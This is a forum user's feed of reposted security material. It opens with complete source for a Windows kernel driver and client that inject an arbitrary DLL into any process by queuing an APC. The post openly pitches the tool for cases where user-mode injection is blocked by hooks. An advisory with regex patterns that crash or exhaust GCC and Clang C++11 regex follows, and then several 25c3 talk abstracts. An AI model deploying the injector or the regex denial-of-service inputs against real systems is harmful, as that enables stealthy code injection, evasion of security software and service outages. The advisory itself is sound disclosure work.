Everything posted by Nytro
-
[h=1]Inject DLL from kernel mode[/h]
Started By zwclose7, Feb 24 2014 04:05 PM

Have you ever tried injecting a DLL from kernel mode? You can inject a DLL from kernel mode when user-mode methods don't work, e.g. when NtOpenProcess or CreateRemoteThread is hooked.

How kernel-mode injection works:

1) Get the address of KdVersionBlock from the KPCR. (__readfsdword)
2) Get the address of MmLoadedUserImageList from KdVersionBlock.
3) Get the base address of ntdll from MmLoadedUserImageList.
4) Parse the export table of ntdll to locate LdrLoadDll.
5) Find a thread to hijack. (ZwQuerySystemInformation)
6) Open the target process. (PsLookupProcessByProcessId)
7) Open the target thread. (PsLookupThreadByThreadId)
8) Attach to the target process's address space. (KeAttachProcess)
9) Allocate memory in the target process's address space. (ZwAllocateVirtualMemory)
10) Copy the DLL name and APC routine into the target process's address space. (memcpy, RtlInitUnicodeString)
11) Set ApcState.UserApcPending to TRUE to force the target thread to execute the APC routine.
12) Allocate an APC object from nonpaged pool. (ExAllocatePool)
13) Initialize the APC and insert it into the target thread. (KeInitializeApc, KeInsertQueueApc)
14) The target thread executes the APC routine in the target process's address space. The APC routine calls LdrLoadDll to load the DLL.
15) Wait for the APC routine to complete.
16) Free the allocated memory. (ZwFreeVirtualMemory, ExFreePool)
17) Detach from the target process's address space. (KeDetachProcess)
18) Dereference the target process and target thread. (ObDereferenceObject)

Usage: To use the injector, run install.bat to install the driver, and then run kinject.exe from a command prompt.

kinject [PID] [DLL name]

Source code (driver)

#include <ntifs.h>
#include <ntddk.h>

typedef struct _SYSTEM_THREAD_INFORMATION
{
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    LONG BasePriority;
    ULONG ContextSwitches;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
}SYSTEM_THREAD_INFORMATION,*PSYSTEM_THREAD_INFORMATION;

typedef struct _SYSTEM_PROCESS_INFO
{
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER WorkingSetPrivateSize;
    ULONG HardFaultCount;
    ULONG NumberOfThreadsHighWatermark;
    ULONGLONG CycleTime;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR UniqueProcessKey;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
    SYSTEM_THREAD_INFORMATION Threads[1];
}SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO;

typedef struct _LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union
    {
        LIST_ENTRY HashLinks;
        struct
        {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    };
    union
    {
        ULONG TimeDateStamp;
        PVOID LoadedImports;
    };
    struct _ACTIVATION_CONTEXT* EntryPointActivationContext;
    PVOID PatchInformation;
    LIST_ENTRY ForwarderLinks;
    LIST_ENTRY ServiceTagLinks;
    LIST_ENTRY StaticLinks;
}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;

typedef struct _IMAGE_DOS_HEADER
{
    USHORT e_magic;
    USHORT e_cblp;
    USHORT e_cp;
    USHORT e_crlc;
    USHORT e_cparhdr;
    USHORT e_minalloc;
    USHORT e_maxalloc;
    USHORT e_ss;
    USHORT e_sp;
    USHORT e_csum;
    USHORT e_ip;
    USHORT e_cs;
    USHORT e_lfarlc;
    USHORT e_ovno;
    USHORT e_res[4];
    USHORT e_oemid;
    USHORT e_oeminfo;
    USHORT e_res2[10];
    LONG e_lfanew;
}IMAGE_DOS_HEADER,*PIMAGE_DOS_HEADER;

typedef struct _IMAGE_DATA_DIRECTORY
{
    ULONG VirtualAddress;
    ULONG Size;
}IMAGE_DATA_DIRECTORY,*PIMAGE_DATA_DIRECTORY;

typedef struct _IMAGE_FILE_HEADER
{
    USHORT Machine;
    USHORT NumberOfSections;
    ULONG TimeDateStamp;
    ULONG PointerToSymbolTable;
    ULONG NumberOfSymbols;
    USHORT SizeOfOptionalHeader;
    USHORT Characteristics;
}IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER;

typedef struct _IMAGE_OPTIONAL_HEADER
{
    USHORT Magic;
    UCHAR MajorLinkerVersion;
    UCHAR MinorLinkerVersion;
    ULONG SizeOfCode;
    ULONG SizeOfInitializedData;
    ULONG SizeOfUninitializedData;
    ULONG AddressOfEntryPoint;
    ULONG BaseOfCode;
    ULONG BaseOfData;
    ULONG ImageBase;
    ULONG SectionAlignment;
    ULONG FileAlignment;
    USHORT MajorOperatingSystemVersion;
    USHORT MinorOperatingSystemVersion;
    USHORT MajorImageVersion;
    USHORT MinorImageVersion;
    USHORT MajorSubsystemVersion;
    USHORT MinorSubsystemVersion;
    ULONG Win32VersionValue;
    ULONG SizeOfImage;
    ULONG SizeOfHeaders;
    ULONG CheckSum;
    USHORT Subsystem;
    USHORT DllCharacteristics;
    ULONG SizeOfStackReserve;
    ULONG SizeOfStackCommit;
    ULONG SizeOfHeapReserve;
    ULONG SizeOfHeapCommit;
    ULONG LoaderFlags;
    ULONG NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[16];
}IMAGE_OPTIONAL_HEADER,*PIMAGE_OPTIONAL_HEADER;

typedef struct _IMAGE_NT_HEADERS
{
    ULONG Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER OptionalHeader;
}IMAGE_NT_HEADERS,*PIMAGE_NT_HEADERS;

typedef struct _IMAGE_EXPORT_DIRECTORY
{
    ULONG Characteristics;
    ULONG TimeDateStamp;
    USHORT MajorVersion;
    USHORT MinorVersion;
    ULONG Name;
    ULONG Base;
    ULONG NumberOfFunctions;
    ULONG NumberOfNames;
    ULONG AddressOfFunctions;
    ULONG AddressOfNames;
    ULONG AddressOfNameOrdinals;
}IMAGE_EXPORT_DIRECTORY,*PIMAGE_EXPORT_DIRECTORY;

#define IMAGE_DIRECTORY_ENTRY_EXPORT 0

extern "C" NTSTATUS ZwQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength);
extern "C" LPSTR PsGetProcessImageFileName(PEPROCESS Process);

typedef NTSTATUS (*PLDR_LOAD_DLL)(PWSTR,PULONG,PUNICODE_STRING,PVOID*);

typedef struct _INJECT_INFO
{
    HANDLE ProcessId;
    wchar_t DllName[1024];
}INJECT_INFO,*PINJECT_INFO;

typedef struct _KINJECT
{
    UNICODE_STRING DllName;
    wchar_t Buffer[1024];
    PLDR_LOAD_DLL LdrLoadDll;
    PVOID DllBase;
    ULONG Executed;
}KINJECT,*PKINJECT;

typedef enum _KAPC_ENVIRONMENT
{
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment,
    InsertApcEnvironment
}KAPC_ENVIRONMENT,*PKAPC_ENVIRONMENT;

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(
    PVOID NormalContext,
    PVOID SystemArgument1,
    PVOID SystemArgument2
);

typedef VOID KKERNEL_ROUTINE(
    PRKAPC Apc,
    PKNORMAL_ROUTINE *NormalRoutine,
    PVOID *NormalContext,
    PVOID *SystemArgument1,
    PVOID *SystemArgument2
);

typedef KKERNEL_ROUTINE (NTAPI *PKKERNEL_ROUTINE);

typedef VOID (NTAPI *PKRUNDOWN_ROUTINE)(
    PRKAPC Apc
);

extern "C" void KeInitializeApc(
    PRKAPC Apc,
    PRKTHREAD Thread,
    KAPC_ENVIRONMENT Environment,
    PKKERNEL_ROUTINE KernelRoutine,
    PKRUNDOWN_ROUTINE RundownRoutine,
    PKNORMAL_ROUTINE NormalRoutine,
    KPROCESSOR_MODE ProcessorMode,
    PVOID NormalContext
);

extern "C" BOOLEAN KeInsertQueueApc(
    PRKAPC Apc,
    PVOID SystemArgument1,
    PVOID SystemArgument2,
    KPRIORITY Increment
);

UNICODE_STRING DeviceName=RTL_CONSTANT_STRING(L"\\Device\\KeInject"),SymbolicLink=RTL_CONSTANT_STRING(L"\\DosDevices\\KeInject");

ULONG ApcStateOffset; // Offset to the ApcState structure
PLDR_LOAD_DLL LdrLoadDll; // LdrLoadDll address

void Unload(PDRIVER_OBJECT pDriverObject)
{
    DbgPrint("DLL injection driver unloaded.");
    IoDeleteSymbolicLink(&SymbolicLink);
    IoDeleteDevice(pDriverObject->DeviceObject);
}

void NTAPI KernelRoutine(PKAPC apc,PKNORMAL_ROUTINE* NormalRoutine,PVOID* NormalContext,PVOID* SystemArgument1,PVOID* SystemArgument2)
{
    ExFreePool(apc);
}

void NTAPI InjectDllApc(PVOID NormalContext,PVOID SystemArgument1,PVOID SystemArgument2)
{
    PKINJECT inject=(PKINJECT)NormalContext;
    inject->LdrLoadDll(NULL,NULL,&inject->DllName,&inject->DllBase);
    inject->Executed=TRUE;
}

BOOLEAN InjectDll(PINJECT_INFO InjectInfo)
{
    PEPROCESS Process;
    PETHREAD Thread;
    PKINJECT mem;
    ULONG size;
    PKAPC_STATE ApcState;
    PKAPC apc;
    PVOID buffer;
    PSYSTEM_PROCESS_INFO pSpi;
    LARGE_INTEGER delay;

    buffer=ExAllocatePool(NonPagedPool,1024*1024); // Allocate memory for the system information
    if(!buffer)
    {
        DbgPrint("Error: Unable to allocate memory for the process thread list.");
        return FALSE;
    }

    // Get the process thread list
    if(!NT_SUCCESS(ZwQuerySystemInformation(5,buffer,1024*1024,NULL)))
    {
        DbgPrint("Error: Unable to query process thread list.");
        ExFreePool(buffer);
        return FALSE;
    }

    pSpi=(PSYSTEM_PROCESS_INFO)buffer;

    // Find a target thread
    while(pSpi->NextEntryOffset)
    {
        if(pSpi->UniqueProcessId==InjectInfo->ProcessId)
        {
            DbgPrint("Target thread found. TID: %d",pSpi->Threads[0].ClientId.UniqueThread);
            break;
        }
        pSpi=(PSYSTEM_PROCESS_INFO)((PUCHAR)pSpi+pSpi->NextEntryOffset);
    }

    // Reference the target process
    if(!NT_SUCCESS(PsLookupProcessByProcessId(InjectInfo->ProcessId,&Process)))
    {
        DbgPrint("Error: Unable to reference the target process.");
        ExFreePool(buffer);
        return FALSE;
    }

    DbgPrint("Process name: %s",PsGetProcessImageFileName(Process));
    DbgPrint("EPROCESS address: %#x",Process);

    // Reference the target thread
    if(!NT_SUCCESS(PsLookupThreadByThreadId(pSpi->Threads[0].ClientId.UniqueThread,&Thread)))
    {
        DbgPrint("Error: Unable to reference the target thread.");
        ObDereferenceObject(Process); // Dereference the target process
        ExFreePool(buffer); // Free the allocated memory
        return FALSE;
    }

    DbgPrint("ETHREAD address: %#x",Thread);
    ExFreePool(buffer); // Free the allocated memory

    KeAttachProcess(Process); // Attach to target process's address space

    mem=NULL;
    size=4096;

    // Allocate memory in the target process
    if(!NT_SUCCESS(ZwAllocateVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,0,&size,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)))
    {
        DbgPrint("Error: Unable to allocate memory in the target process.");
        KeDetachProcess(); // Detach from target process's address space
        ObDereferenceObject(Process); // Dereference the target process
        ObDereferenceObject(Thread); // Dereference the target thread
        return FALSE;
    }

    DbgPrint("Memory allocated at %#x",mem);

    mem->LdrLoadDll=LdrLoadDll; // Write the address of LdrLoadDll to target process
    wcscpy(mem->Buffer,InjectInfo->DllName); // Write the DLL name to target process
    RtlInitUnicodeString(&mem->DllName,mem->Buffer); // Initialize the UNICODE_STRING structure

    ApcState=(PKAPC_STATE)((PUCHAR)Thread+ApcStateOffset); // Calculate the address of the ApcState structure
    ApcState->UserApcPending=TRUE; // Force the target thread to execute APC

    memcpy((PKINJECT)(mem+1),InjectDllApc,(ULONG)KernelRoutine-(ULONG)InjectDllApc); // Copy the APC code to target process

    DbgPrint("APC code address: %#x",(PKINJECT)(mem+1));

    apc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC)); // Allocate the APC object
    if(!apc)
    {
        DbgPrint("Error: Unable to allocate the APC object.");
        size=0;
        ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory
        KeDetachProcess(); // Detach from target process's address space
        ObDereferenceObject(Process); // Dereference the target process
        ObDereferenceObject(Thread); // Dereference the target thread
        return FALSE;
    }

    KeInitializeApc(apc,Thread,OriginalApcEnvironment,KernelRoutine,NULL,(PKNORMAL_ROUTINE)((PKINJECT)mem+1),UserMode,mem); // Initialize the APC

    DbgPrint("Inserting APC to target thread");

    // Insert the APC to the target thread
    if(!KeInsertQueueApc(apc,NULL,NULL,IO_NO_INCREMENT))
    {
        DbgPrint("Error: Unable to insert APC to target thread.");
        size=0;
        ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory
        KeDetachProcess(); // Detach from target process's address space
        ObDereferenceObject(Process); // Dereference the target process
        ObDereferenceObject(Thread); // Dereference the target thread
        ExFreePool(apc); // Free the APC object
        return FALSE;
    }

    delay.QuadPart=-100*10000;

    while(!mem->Executed)
    {
        KeDelayExecutionThread(KernelMode,FALSE,&delay); // Wait for the injection to complete
    }

    if(!mem->DllBase)
    {
        DbgPrint("Error: Unable to inject DLL into target process.");
        size=0;
        ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE);
        KeDetachProcess();
        ObDereferenceObject(Process);
        ObDereferenceObject(Thread);
        return FALSE;
    }

    DbgPrint("DLL injected at %#x",mem->DllBase);

    size=0;
    ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory
    KeDetachProcess(); // Detach from target process's address space
    ObDereferenceObject(Process); // Dereference the target process
    ObDereferenceObject(Thread); // Dereference the target thread
    return TRUE;
}

NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
    PIO_STACK_LOCATION io;
    PINJECT_INFO InjectInfo;
    NTSTATUS status;

    io=IoGetCurrentIrpStackLocation(irp);
    irp->IoStatus.Information=0;

    switch(io->MajorFunction)
    {
    case IRP_MJ_CREATE:
        status=STATUS_SUCCESS;
        break;

    case IRP_MJ_CLOSE:
        status=STATUS_SUCCESS;
        break;

    case IRP_MJ_READ:
        status=STATUS_SUCCESS;
        break;

    case IRP_MJ_WRITE:
        InjectInfo=(PINJECT_INFO)MmGetSystemAddressForMdlSafe(irp->MdlAddress,NormalPagePriority);
        if(!InjectInfo)
        {
            status=STATUS_INSUFFICIENT_RESOURCES;
            break;
        }
        if(!InjectDll(InjectInfo))
        {
            status=STATUS_UNSUCCESSFUL;
            break;
        }
        status=STATUS_SUCCESS;
        irp->IoStatus.Information=sizeof(INJECT_INFO);
        break;

    default:
        status=STATUS_INVALID_DEVICE_REQUEST;
        break;
    }

    irp->IoStatus.Status=status;
    IoCompleteRequest(irp,IO_NO_INCREMENT);
    return status;
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
    PDEVICE_OBJECT DeviceObject;
    PEPROCESS Process;
    PETHREAD Thread;
    PKAPC_STATE ApcState;
    PVOID KdVersionBlock,NtdllBase;
    PULONG ptr,Functions,Names;
    PUSHORT Ordinals;
    PLDR_DATA_TABLE_ENTRY MmLoadedUserImageList,ModuleEntry;
    ULONG i;
    PIMAGE_DOS_HEADER pIDH;
    PIMAGE_NT_HEADERS pINH;
    PIMAGE_EXPORT_DIRECTORY pIED;

    pDriverObject->DriverUnload=Unload;

    KdVersionBlock=(PVOID)__readfsdword(0x34); // Get the KdVersionBlock
    MmLoadedUserImageList=*(PLDR_DATA_TABLE_ENTRY*)((PUCHAR)KdVersionBlock+0x228); // Get the MmLoadedUserImageList

    DbgPrint("KdVersionBlock address: %#x",KdVersionBlock);
    DbgPrint("MmLoadedUserImageList address: %#x",MmLoadedUserImageList);

    ModuleEntry=(PLDR_DATA_TABLE_ENTRY)MmLoadedUserImageList->InLoadOrderLinks.Flink; // Move to first entry
    NtdllBase=ModuleEntry->DllBase; // ntdll is always located in first entry

    DbgPrint("ntdll base address: %#x",NtdllBase);

    pIDH=(PIMAGE_DOS_HEADER)NtdllBase;
    pINH=(PIMAGE_NT_HEADERS)((PUCHAR)NtdllBase+pIDH->e_lfanew);
    pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)NtdllBase+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    Functions=(PULONG)((PUCHAR)NtdllBase+pIED->AddressOfFunctions);
    Names=(PULONG)((PUCHAR)NtdllBase+pIED->AddressOfNames);
    Ordinals=(PUSHORT)((PUCHAR)NtdllBase+pIED->AddressOfNameOrdinals);

    // Parse the export table to locate LdrLoadDll
    for(i=0;i<pIED->NumberOfNames;i++)
    {
        if(!strcmp((char*)NtdllBase+Names[i],"LdrLoadDll"))
        {
            LdrLoadDll=(PLDR_LOAD_DLL)((PUCHAR)NtdllBase+Functions[Ordinals[i]]);
            break;
        }
    }

    DbgPrint("LdrLoadDll address: %#x",LdrLoadDll);

    Process=PsGetCurrentProcess();
    Thread=PsGetCurrentThread();
    ptr=(PULONG)Thread;

    // Locate the ApcState structure
    for(i=0;i<512;i++)
    {
        if(ptr[i]==(ULONG)Process)
        {
            ApcState=CONTAINING_RECORD(&ptr[i],KAPC_STATE,Process); // Get the actual address of KAPC_STATE
            ApcStateOffset=(ULONG)ApcState-(ULONG)Thread; // Calculate the offset of the ApcState structure
            break;
        }
    }

    DbgPrint("ApcState offset: %#x",ApcStateOffset);

    IoCreateDevice(pDriverObject,0,&DeviceName,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&DeviceObject);
    IoCreateSymbolicLink(&SymbolicLink,&DeviceName);

    for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
    {
        pDriverObject->MajorFunction[i]=DriverDispatch;
    }

    DeviceObject->Flags&=~DO_DEVICE_INITIALIZING;
    DeviceObject->Flags|=DO_DIRECT_IO;

    DbgPrint("DLL injection driver loaded.");
    return STATUS_SUCCESS;
}

Source code (user mode application)

#include <stdio.h>
#include <Windows.h>

typedef struct _INJECT_INFO
{
    HANDLE ProcessId;
    wchar_t DllName[1024];
}INJECT_INFO,*PINJECT_INFO;

int wmain(int argc,wchar_t* argv[])
{
    HANDLE hFile;
    DWORD write;
    INJECT_INFO InjectInfo;

    if(argc<3)
    {
        printf("\nUsage: kinject [PID] [DLL name]\n");
        return -1;
    }

    hFile=CreateFile(L"\\\\.\\KeInject",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
    if(hFile==INVALID_HANDLE_VALUE)
    {
        printf("\nError: Unable to connect to the driver (%d)\n",GetLastError());
        return -1;
    }

    memset(&InjectInfo,0,sizeof(INJECT_INFO));
    InjectInfo.ProcessId=(HANDLE)wcstoul(argv[1],NULL,0);
    wcscpy(InjectInfo.DllName,argv[2]);

    if(!WriteFile(hFile,&InjectInfo,sizeof(INJECT_INFO),&write,NULL))
    {
        printf("\nError: Unable to write data to the driver (%d)\n",GetLastError());
        CloseHandle(hFile);
        return -1;
    }

    CloseHandle(hFile);
    return 0;
}

[h=4]Attached Files[/h]
KeInject.zip 447.64KB 438 downloads

Sursa: Inject DLL from kernel mode - Source Codes - rohitab.com - Forums
-
C++11 Resource Exhaustion
Authored by Maksymilian Arciemowicz | Site cxsecurity.com

GCC and CLANG C++11 regex functionality suffers from resource exhaustion issues.

C++11 <regex> insecure by default
http://cxsecurity.com/issue/WLB-2014070187

--- 0 Description ---

In this article I present the conclusions from testing the new 'objective regex' in several implementations of the standard C++ library, namely libcxx (clang) and libstdc++ (gcc). The results show weaknesses in the officially supported implementations. Huge matching complexity and memory exhaustion were well known issues in most libc libraries. In theory, the new C++11 <regex> eliminates resource exhaustion by specifying special limits that protect against evil patterns. In glibc, the position was that the vendor using the regex implementation is responsible for the safe use of regcomp(). However, it is difficult to validate regular expressions inside client applications, and remote services are affected as well. The exception support for regex errors looks very promising. Let's see some part of the documentation for std::regex_error:

-std::regex_constants::error_type-----------------------
error_space      there was not enough memory to convert the expression into a finite state machine
error_complexity the complexity of an attempted match exceeded a predefined level
error_stack      there was not enough memory to perform a match
-std::regex_constants::error_type-----------------------

error_complexity looks promising, but which complexity level is best? There are many possible trade-offs between usability and security. From a security perspective this level should be low, to keep execution close to real time. This is in contrast to static code analysis, where execution time is not so important. The other constants, like error_space and error_stack, are also interesting from a security point of view.

After the official release of libstdc++ <regex> in GCC 4.9.0 I decided to check this implementation. To prove that these limits do not fulfill their role, I reported the issues below.

GCC:
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582

CLANG:
libcxx C++11 regex cpu resource exhaustion
http://llvm.org/bugs/show_bug.cgi?id=20291

In my observation libc++ wins on performance; only the error_complexity problem was reported. In ticket #20291 we are looking for an answer on the default pre-set complexity level; however, the right value can be personal for each use case. GCC fixed the most dangerous issues before releasing the official 4.9.0 version, where <regex> is supported. Still, a stack overflow occurs in the latest regex implementation.

--- 0.1 GCC before 4.9 Memory corruption ---

# ./c11RE '(|'
Segmentation fault (core dumped)

--- 0.2 GCC 4.9 Memory corruption ---

(gdb) r '((.*)()?*{100})'
Starting program: /home/cx/REstd11/kozak5/./c11re '((.*)()?*{100})'
Program received signal SIGSEGV, Segmentation fault.
0x0000000000402f15 in std::_Bit_reference::operator bool() const

--- 0.3 GCC Trunk Stack Overflow ---

Starting program: /home/cx/REtrunk/kozak5/t3 '(.*{100}{300})'
Program received signal SIGSEGV, Segmentation fault.
0x000000000040c22a in std::__detail::_Executor<char const*, std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, true>::_M_dfs(std::__detail::_Executor<char const*, std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, true>::_Match_mode, long) ()

--- 0.4 CLANG CPU Exhaustion PoC ---

#include <iostream>
#include <regex>
#include <string>

using namespace std;

int main()
{
    try {
        regex r("(.*(.*){999999999999999999999999999999999})", regex_constants::extended);
        smatch results;
        string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||";

        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (regex_error &e) {
        cout << "extended: what: " << e.what() << "; code: " << e.code() << endl;
    }
    return 0;
}

--- CLANG CPU Exhaustion ---

--- 1 Conclusion ---

I think this is a dangerous situation that may put the quality on a par with glibc <regex.h>. Maybe only a new type of extended regular expression will provide safety? It is a good moment to start a discussion about the safety of regex in the new C++.

--- 2 References ---

libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
libcxx C++11 regex cpu resource exhaustion
http://llvm.org/bugs/show_bug.cgi?id=20291
GCC 4.9 Release Series New Features
https://gcc.gnu.org/gcc-4.9/changes.html

--- 3 Thanks ---

gcc and clang support and KacperR

--- 4 About ---

Author: Maksymilian Arciemowicz
Contact: http://cxsecurity.com/wlb/add/

Sursa: C++11 Resource Exhaustion ≈ Packet Storm
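A practical note on the error_type constants quoted in the advisory: the intended defensive pattern is to compile and match untrusted expressions inside a try block and inspect the reported error code. The sketch below is my own illustration (a hypothetical "retest" tool, not part of the advisory); as the advisory shows, whether and when error_complexity, error_space or error_stack actually fire is implementation-defined, so this check alone is not a guarantee.

#include <iostream>
#include <regex>
#include <string>

// Compile and run an untrusted pattern against a subject string, and report
// which resource limit (if any) the library enforced. The limits themselves
// are implementation-defined, which is exactly the problem discussed above.
int main(int argc, char* argv[]) {
    if (argc < 3) {
        std::cerr << "usage: retest <pattern> <subject>\n";
        return 2;
    }
    try {
        std::regex re(argv[1], std::regex_constants::extended);
        std::smatch m;
        std::string subject = argv[2];
        std::cout << (std::regex_search(subject, m, re) ? "match" : "no match") << "\n";
    } catch (const std::regex_error& e) {
        if (e.code() == std::regex_constants::error_complexity)
            std::cerr << "rejected: match too complex\n";
        else if (e.code() == std::regex_constants::error_space ||
                 e.code() == std::regex_constants::error_stack)
            std::cerr << "rejected: out of memory/stack during match\n";
        else
            std::cerr << "regex error: " << e.what() << "\n";
        return 1;
    }
    return 0;
}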
-
25c3 - An Introduction To New Stream Cipher Designs
Description: An introduction to new stream cipher designs - Turning data into line noise and back

Even with "nothing to hide", we want to protect the privacy of our bits and bytes. Encryption is an important tool for this, and stream ciphers are a major class of symmetric-key encryption schemes. Algorithms such as RC4 (used in WEP/WPA, bittorrent, SSL), A5/1 (GSM telephony), E0 (bluetooth), as well as AES in counter (CTR) mode, are important examples of stream ciphers used in everyday applications. Whereas a block cipher such as AES works by encrypting fixed-length data blocks (and chaining these together in a suitable mode of operation), stream ciphers output a unique, arbitrary-length keystream of pseudorandom bits or bytes, which is simply XORed with the plaintext stream to produce the ciphertext. Advantages of stream ciphers often include a smaller hardware footprint and higher encryption speeds than comparable block ciphers such as AES. However, cryptanalysis has led to attacks on many of the existing algorithms.

The ECRYPT Stream Cipher Project (eSTREAM) has been a 4-year project funded by the EU to evaluate new and promising stream ciphers. The project ended in April 2008, with a final portfolio which currently consists of 7 ciphers: 3 suitable for hardware implementation, and 4 aimed at software environments. The portfolio ciphers are considered to provide an advantage over plain AES in at least one significant aspect, but the designs are very different and often suited for different applications. Since the eSTREAM ciphers are quite new, many of them are not well known outside the academic community. The goal of this talk is to give a very quick presentation of each of the 7 portfolio ciphers: Grain v1, MICKEY v2, Trivium, HC-128, Rabbit, Salsa20/12 and SOSEMANUK.

For More Information please visit : - 25C3: speakers
Sursa: 25c3 - An Introduction To New Stream Cipher Designs
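To make the keystream idea from the abstract concrete, here is a toy sketch of the XOR relationship between plaintext, keystream and ciphertext. The "keystream" below is a hard-coded placeholder, not a real cipher; an actual design would generate it with one of the eSTREAM portfolio ciphers (e.g. Salsa20/12) keyed with a secret key and nonce, and would never reuse or cycle it.

#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Stream-cipher principle only: ciphertext = plaintext XOR keystream, and
// applying the same keystream again recovers the plaintext. The keystream
// here is a fixed byte pattern and is NOT cryptographically secure.
static std::vector<uint8_t> xor_with_keystream(const std::vector<uint8_t>& in,
                                               const std::vector<uint8_t>& keystream) {
    std::vector<uint8_t> out(in.size());
    for (std::size_t i = 0; i < in.size(); ++i)
        out[i] = in[i] ^ keystream[i % keystream.size()]; // toy: cycles the keystream
    return out;
}

int main() {
    std::string msg = "attack at dawn";
    std::vector<uint8_t> pt(msg.begin(), msg.end());
    std::vector<uint8_t> ks = {0x13, 0x37, 0xca, 0xfe, 0xba, 0xbe}; // placeholder keystream
    std::vector<uint8_t> ct = xor_with_keystream(pt, ks); // "encrypt"
    std::vector<uint8_t> rt = xor_with_keystream(ct, ks); // "decrypt": same operation
    return rt == pt ? 0 : 1;
}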
-
25c3 - Full Disk Encryption Crash Course Description: Full-Disk-Encryption Crash-Course Everything to hide This is not a hacking presentation, no vulnerabilities are presented. It's a crash-course in full-disk-encryption ("FDE") concepts, products and implementation aspects. An overview of both commercial and open-source offerings for Windows, Linux, and MacOSX is given. A (programmer's) look at the open-source solutions concludes the presentation. Full-Disk-Encryption is an important aspect of data security and everyone should use an appropriate solution to protect their (especially mobile) systems and data. This lecture covers the technology behind Full-Disk-Encryption software products. The established technical architectures of software solutions for Microsoft Windows and Linux are presented in this lecture: Pre-Boot-Authentication, encryption driver and in-place filesystem encryption. An overview of commercial products and open-source offerings for Windows, Linux and OSX is given. Distinguishing features of specific products and additional topics are covered, including: TPM support (OS binding and key storage), multi-disk support and threats. The last segment of the lecture focuses on open-source solutions: TrueCrypt's volume specifications, TrueCrypt's hidden volume capabilities and a comparison of in-place filesystem encryption implementations of TrueCrypt and DiskCryptor. A feature wish-list for open-source Full-Disk-Encryption solutions completes the lecture. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Full Disk Encryption Crash Course
-
25c3 - Chip Reverse Engineering
Description: Chip Reverse Engineering

Cryptographic algorithms are often kept secret in the false belief that this provides security. To find and analyze these algorithms, we reverse-engineer the silicon chips that implement them. With simple tools, we open the chips, take pictures, and analyze their internal structures. The talk provides all the details you need to start reversing chips yourself. Happy hacking!

For More Information please visit : - 25C3: speakers
Sursa: 25c3 - Chip Reverse Engineering
-
25c3 - Security Failures In Smart Card Payment Systems
